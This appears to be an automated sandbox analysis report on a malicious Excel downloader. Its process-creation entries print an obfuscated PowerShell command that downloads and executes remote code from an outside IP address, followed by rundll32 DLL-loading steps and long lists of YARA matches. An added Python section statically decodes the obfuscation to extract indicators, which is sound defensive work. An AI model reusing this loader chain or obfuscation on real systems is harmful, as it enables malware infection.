Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
Source: Yara match File source: CJ68000754184.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPED
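The process-creation entries above give the whole delivery chain: cmd.exe runs mshta against http://91.240.118.172/gg/ff/fe.html, the HTA starts powershell.exe -noexit with a command line whose string pieces are padded with the junk token {FdrggvdRf} and stripped again at run time with .replace(), joined with -Join and handed to a backtick-split I`E`X, and whatever DownloadString fetches from fe.png is piped straight into a second IEX, so the "image" is executed as PowerShell. That stage drops C:\ProgramData\JooSee.dll, which rundll32 loads first through the export ssAAqq and then again through DllRegisterServer before re-launching itself from randomly named copies under C:\Windows\SysWOW64\. The Python below is an added example, not code from the report or from the sample: it undoes the string obfuscation statically and lists the IOCs, so none of the stages are executed. The event list is constructed from the command lines above (with the quoted powershell.exe path trimmed); the regexes are my own and assume exactly this 'literal'.replace('token', '') / -Join '' shape, not PowerShell in general.

```python
"""Static decoding of the mshta -> powershell -> rundll32 chain listed above.

Added example, not code from the report or from the sample: it undoes the
'{token}'.replace()/-Join string obfuscation of the PowerShell stage and pulls
URLs and rundll32 module/export pairs out of the command lines, without
executing anything.
"""
import re

# Constructed input: (parent image, child command line) pairs copied from the
# process-creation entries above; the quoted powershell.exe path is trimmed.
EVENTS = [
    ("cmd.exe", "mshta http://91.240.118.172/gg/ff/fe.html"),
    ("mshta.exe", r"""powershell.exe -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"""),
    ("powershell.exe", r'"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq'),
    ("cmd.exe", r"C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq"),
    ("rundll32.exe", r'C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer'),
    ("rundll32.exe", r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv'),
]

# $name='literal'.replace('token', '') with PowerShell single-quote escaping ('' -> ').
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'\s*\.replace\('((?:[^']|'')*)',\s*''\)", re.I)
# $name=($a,$b,$c -Join '')
JOIN_RE = re.compile(r"\$(\w+)\s*=\s*\(((?:\s*\$\w+\s*,?)+)\s*-Join\s*''\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)
# rundll32.exe <module> <export>  or  rundll32.exe "<module>",<export>
RUNDLL_RE = re.compile(r'rundll32\.exe\s+"?([^"\s,]+)"?\s*[,\s]\s*(\w+)', re.I)


def _unquote(lit: str) -> str:
    """Collapse the '' escape of a PowerShell single-quoted literal."""
    return lit.replace("''", "'")


def decode_powershell_replace_join(cmdline: str) -> dict:
    """Rebuild the string that IEX would receive, without running PowerShell."""
    variables, tokens = {}, set()
    for name, literal, token in ASSIGN_RE.findall(cmdline):
        token = _unquote(token)
        tokens.add(token)
        variables[name] = _unquote(literal).replace(token, "")
    joined = ""
    m = JOIN_RE.search(cmdline)
    if m:  # concatenate the variables in the order the -Join lists them
        joined = "".join(variables.get(n, "") for n in re.findall(r"\$(\w+)", m.group(2)))
    # Backticks inside a bare word are no-op escapes, so I`E`X is just IEX.
    plain = cmdline.replace("`", "")
    return {
        "tokens": sorted(tokens),
        "variables": variables,
        "joined": joined,
        "urls": URL_RE.findall(joined),
        "invokes_expression": re.search(r"\b(iex|invoke-expression)\b", plain, re.I) is not None,
    }


def chain_iocs(events) -> dict:
    """Collect URLs and rundll32 module/export pairs across the whole chain."""
    urls, modules, decoded = set(), set(), []
    for _parent, cmdline in events:
        urls.update(URL_RE.findall(cmdline))
        modules.update(RUNDLL_RE.findall(cmdline))
        if ".replace(" in cmdline.lower() and "-join" in cmdline.lower():
            d = decode_powershell_replace_join(cmdline)
            decoded.append(d["joined"])
            urls.update(d["urls"])  # the URL only exists after de-obfuscation
    return {"urls": sorted(urls), "modules": sorted(modules), "decoded_powershell": decoded}


if __name__ == "__main__":
    for key, value in chain_iocs(EVENTS).items():
        print(key, value)
```

The decoded stage is `(New-Object Net.WebClient).DownloadString('http://91.240.118.172/gg/ff/fe.png')`, which the raw command line never contains as a searchable substring; a URL or "Net.WebClient" string match on the command line alone would miss it, which is why the detection entries above fire on the process relationships (mshta spawning PowerShell, PowerShell spawning cmd.exe/rundll32) rather than on the payload text.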

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 12_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 12_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 12_2_10014B71
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation (2 identical entries)
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation (2 identical entries)
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information

Source: Yara match File source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.29e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ed0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3180000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3110000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2920000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2870000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.970000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.940000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2870000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e10000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.30e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2870000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.360000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2de0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2790000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2650000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.480000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3110000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2920000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.30e0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3110000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.360000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.22f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.4a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.940000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED